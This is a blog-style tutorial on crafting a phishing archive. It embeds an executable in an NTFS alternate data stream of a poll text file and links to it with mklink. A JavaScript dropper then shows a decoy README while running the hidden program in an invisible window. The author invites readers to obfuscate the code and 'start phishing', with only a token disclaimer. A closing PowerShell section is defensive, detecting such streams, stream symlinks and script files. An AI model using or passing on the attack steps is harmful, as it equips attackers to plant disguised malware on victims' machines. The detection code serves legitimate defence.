Creating a Phishing Attack by Utilizing Alternate Data Streams

Recently I have been seeing phishing attacks in the wild that carry malicious JavaScript files which download a more sophisticated piece of malware from a Command & Control server. This kind of attack looks set to continue in the coming years.

Let's investigate whether malware can be embedded in a text file and launched from JavaScript without the need for a C&C server.

In our scenario, we assume that we are sending four files (two of them preferably hidden) inside a zipped directory, presented as part of a poll:

1) The first file is Poll.txt, which matches the pretext of our phishing attack. It contains some multiple-choice questions.

Our purpose here is to embed malware.exe (calc.exe in this example) into Poll.txt. The following command writes the exe into an alternate data stream (ADS) of the text file:

type calc.exe > Poll.txt:calc.exe

Now Poll.txt has another exe file embedded inside it. You can verify this with the "dir /r" command, which lists a file's alternate streams.

2) It is no longer possible to run an embedded file directly from a file's ADS. But there is a workaround. First, we create a symbolic link to the embedded stream:

mklink config.txt Poll.txt:calc.exe

Now, if you type 'config.txt' at the command prompt, you will see calc.exe pop up (double-clicking the file does not have the same effect). You can hide the file through its Properties dialog.

3) Create another text file, README.txt, and put some text into it. You can hide that file as well.

4) It is time to prepare the JavaScript file, README.js. This file opens README.txt visibly and runs calc.exe in a hidden window.

// Windows Script Host: Shell.Application lets a .js file launch other programs
var objShell = new ActiveXObject("shell.application");

// Run the symlink via cmd.exe with window style 0 (hidden); this launches calc.exe
objShell.ShellExecute("cmd.exe", "/c config.txt", "", "open", 0);

// Open the decoy README.txt in a normal, visible window (window style 1)
objShell.ShellExecute("README.txt", "", "", "open", 1);

You can obfuscate this code, of course. I leave that to you.

This JavaScript file cannot run successfully when called from a browser because of browser security restrictions; it only works when launched through Windows Script Host (for example by double-clicking it). You are welcome to share any ideas about making it possible.

Phishing Attack

We are done. Now you can zip this directory and start phishing 🙂

(Please use such techniques only for ethical pen testing purposes; it is illegal to use them otherwise, and don't be a fool.)
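Seen from the receiving side, each of the steps above leaves an on-disk artifact that can be checked before anything in an extracted archive is opened: a named data stream on a text file, a symbolic link whose target is a stream rather than a file, and a WSH script sitting next to the decoys. The PowerShell below is an added example for that check, not code from the original post; the quarantine folder path and the function name are placeholders.

```powershell
# Added defensive example, not part of the original post. Scans a folder an attachment
# was extracted into for the artifacts the technique above relies on.
function Get-AdsPhishingFindings {
    param([Parameter(Mandatory)][string]$Root)   # folder to scan, supplied by the caller

    $findings = @()
    # -Force also lists files hidden via Properties, as the post suggests doing
    foreach ($file in Get-ChildItem -LiteralPath $Root -File -Recurse -Force) {

        # 1) Alternate data streams. ':$DATA' is the normal unnamed stream and
        #    Zone.Identifier is the benign mark-of-the-web; anything else
        #    (for example a stream named 'calc.exe') on a .txt file is worth a look.
        $streams = Get-Item -LiteralPath $file.FullName -Stream * -Force -ErrorAction SilentlyContinue |
                   Where-Object { $_.Stream -notin ':$DATA', 'Zone.Identifier' }
        foreach ($s in $streams) {
            $findings += [pscustomobject]@{
                File = $file.FullName; Type = 'AlternateDataStream'
                Detail = "stream '$($s.Stream)', $($s.Length) bytes"
            }
        }

        # 2) Symbolic link (mklink) whose target's last path segment contains a colon,
        #    i.e. it resolves into a stream such as Poll.txt:calc.exe, not a regular file.
        if ($file.LinkType -eq 'SymbolicLink') {
            $target = @($file.Target)[0]          # string[] on PS 5.1, string on PS 7
            if (($target -split '[\\/]')[-1] -match ':') {
                $findings += [pscustomobject]@{
                    File = $file.FullName; Type = 'SymlinkToStream'; Detail = "target '$target'"
                }
            }
        }

        # 3) Script files that Windows Script Host would run on double-click
        if ($file.Extension -in '.js', '.jse', '.vbs', '.wsf') {
            $findings += [pscustomobject]@{
                File = $file.FullName; Type = 'ScriptFile'; Detail = 'WSH script in attachment'
            }
        }
    }
    return $findings
}

# Usage: point it at the extracted archive (placeholder path) and review the table
Get-AdsPhishingFindings -Root 'C:\Quarantine\extracted' | Format-Table -AutoSize
```

A clean poll attachment should produce an empty table; a directory built as described above reports all three finding types.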